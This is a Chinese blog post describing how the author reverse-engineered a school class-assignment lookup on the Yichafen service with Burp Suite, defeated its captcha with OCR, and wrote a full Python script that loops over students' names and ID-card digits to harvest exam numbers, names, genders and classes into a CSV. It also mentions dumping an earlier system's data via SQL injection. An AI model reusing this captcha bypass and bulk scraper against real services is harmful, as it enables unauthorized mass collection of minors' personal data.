爬取易查分2024滕州二中新高一分班数据

滕州二中今年的分班查询开始了，我原本以为还是去年的那套有注入漏洞的系统，直接加一个'就能爆全部信息，结果今年换成易查分了，没办法只能试试。

分析

打开链接，出现的就是让人头疼的蓝白UI

但是我各种姿势尝试了半天，还是没法切换到之前的电脑UI，因为我记得老版本的易查分电脑UI好像可以绕过验证码

用bp抓包，看一下原理

点击确定后是一个包含输入的姓名(URLencode)和身份证后六位数据的POST请求

Forward之后看一下返回包

json部分unicode解码后为
{"info":"查询成功","status":1,"url":"\/public\/queryresult\/from_device\/mobile.html"}

接着继续forward，然后收到一个新包

这里请求的地址刚好是上一个返回包json中的url

接着继续查看返回包
很好，已经拿到数据

现在整个查询流程基本清楚，尝试自己更改请求包获取不同学生的数据

开始伪造

在自己尝试多次重放包时，突然提示Cookie错误，重新抓包一看，又需要验证码了
{"info":"\u9a8c\u8bc1\u7801\u4e0d\u6b63\u786e","status":0,"errNo":100,"showCountdown":true,"showPicVerify":true}
解密后 {"info":"验证码不正确","status":0,"errNo":100,"showCountdown":true,"showPicVerify":true}

在首页刷新抓包找到刷新验证码的包，丢到Repeater尝试，可以直接使用

然后我尝试重放验证码，然后在包含姓名身份证的请求包中加入参数verify，返回包又变成了'status':1

接下来的原理更明朗了：用户获得一个cookie，在网页加载时先发送带有cookie的get请求获取验证码，然后用户点击登录后将所填姓名、身份证、验证码一并发送到url1，在url1的服务器验证验证码正确后将所查学生信息绑定到cookie的phpsessid上，接着发送带有cookie的get请求到url2，服务器利用cookie鉴权后将学生信息返回到前端，查询完毕。

编写程序

简介一下原理：
用户自行访问网站获取cookid，并固定到header中。
程序首先发送带有固定header的get请求获取验证码，保存到本地，然后使用ddddocr库识别验证码，识别后删除本地文件并将识别的内容传到请求包1中的verify参数中，同时程序逐行读取stuinfo.txt中的数据，使用tqdm库显示进度条。
然后程序发送请求包。如果返回包状态码为200就继续发送带有固定header的请求包2，然后程序获取返回包，并使用BeautifulSoup库解析html，接着保存为cvs文件。

在这里我就直接放成品了

import requests
from io import BytesIO
import ddddocr
import os
from bs4 import BeautifulSoup
import csv
from tqdm import tqdm

def save_to_csv(data, filename='results.csv'):
    file_exists = os.path.isfile(filename)
    with open(filename, mode='a', newline='', encoding='utf-8') as file:
        writer = csv.DictWriter(file, fieldnames=['准考证号', '姓名', '性别', '班级', '类型'])
        if not file_exists:
            writer.writeheader()
        writer.writerow(data)

def get_captcha(session, captcha_page_url, local_filename):
    response = session.get(captcha_page_url, headers=common_headers)
    with open(local_filename, 'wb') as f:
        f.write(response.content)
    ocr = ddddocr.DdddOcr()
    with open(local_filename, 'rb') as f:
        captcha_text = ocr.classification(f.read())
    os.remove(local_filename)
    return captcha_text

# 读取 stuinfo.txt 文件
with open('stuinfo.txt', 'r', encoding='utf-8') as file:
    lines = file.readlines()

common_headers = {
    'Host': '********.yichafen.com',
    'Cookie': '*************',
    'Sec-Ch-Ua': '"-Not.A/Brand";v="8", "Chromium";v="102"',
    'Dnt': '1',
    'Sec-Ch-Ua-Mobile': '?0',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
    'Sec-Ch-Ua-Platform': '"Windows"',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close'
}

session = requests.Session()

captcha_page_url = 'https://********.yichafen.com/public/verify.html'
local_filename = 'captcha.png'

headers_post = {
    'Host': '********.yichafen.com',
    'Cookie': '**************',
    'Sec-Ch-Ua': '"-Not.A/Brand";v="8", "Chromium";v="102"',
    'Dnt': '1',
    'Sec-Ch-Ua-Mobile': '?0',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept': '*/*',
    'X-Requested-With': 'XMLHttpRequest',
    'Sec-Ch-Ua-Platform': '"Windows"',
    'Origin': 'https://********.yichafen.com',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Dest': 'empty',
    'Referer': 'https://********.yichafen.com/qz/L7P1Tvwqlt?from_device=mobile',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close'
}

headers_get = {
    'Host': '********.yichafen.com',
    'Cookie': '********',
    'Sec-Ch-Ua': '"-Not.A/Brand";v="8", "Chromium";v="102"',
    'Sec-Ch-Ua-Mobile': '?0',
    'Sec-Ch-Ua-Platform': '"Windows"',
    'Upgrade-Insecure-Requests': '1',
    'Dnt': '1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Dest': 'iframe',
    'Referer': 'https://********.yichafen.com/qz/L7P1Tvwqlt?from_device=mobile',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close'
}

# 逐行处理数据，并显示进度条
for line in tqdm(lines, desc="Processing Students", unit="student"):
    name, id_card = line.strip().split(',')
    last_six_digits = id_card[-6:]
    captcha = get_captcha(session, captcha_page_url, local_filename)
    print(f"识别的验证码为: {captcha}")

    data = {
        's_xingming': name,
        's_shenfenzhenghouliuwei': last_six_digits,
        'verify': captcha
    }

    post_url = 'https://********.yichafen.com/public/verifycondition/sqcode/NsjcAn4mMjU3MHw5ZGNhYmNhNDhiYzliNjRkNGJjZjNjZThiZmRjY2Q3Y3xzNmFqd3p5ZAO0O0OO0O0O/from_device/mobile.html'
    post_response = requests.post(post_url, headers=headers_post, data=data)

    if post_response.status_code == 200:
        print(post_response.text)
        print(f"POST请求成功: 姓名: {name}, 身份证后六位: {last_six_digits}")

        get_url = 'https://********.yichafen.com/public/queryresult/from_device/mobile.html'
        get_response = requests.get(get_url, headers=headers_get)

        soup = BeautifulSoup(get_response.text, 'html.parser')
        table = soup.find('table', {'class': 'table table-bordered s_table-bordered js_result_table'})
        rows = table.find_all('tr')

        data = {}
        for row in rows:
            cols = row.find_all('td')
            label = cols[0].get_text(strip=True)
            value = cols[1].get_text(strip=True)
            if label in ['准考证号', '姓名', '性别', '班级', '类型']:
                data[label] = value

        print(data)
        print("\n\n")
        save_to_csv(data)
    else:
        print(f"POST请求失败: 姓名: {name}, 身份证后六位: {last_six_digits}")

成功

程序成功正常运行，奈何由于需要多次发包和OCR，程序的效率不尽人意，平均速度只有2s/item

爬虫

#Python #易查分 #BurpSuite

爬取易查分2024滕州二中新高一分班数据

http://blog.luckysix.cc/2024/08/19/爬取易查分2024滕州二中新高一分班数据/

作者

Thanatos

发布于

2024年8月19日

许可协议

翻墙软件的对手长城防火墙(GFW)是如何检测和封锁流量的上一篇

iKun_Keyboard--爱坤键盘下一篇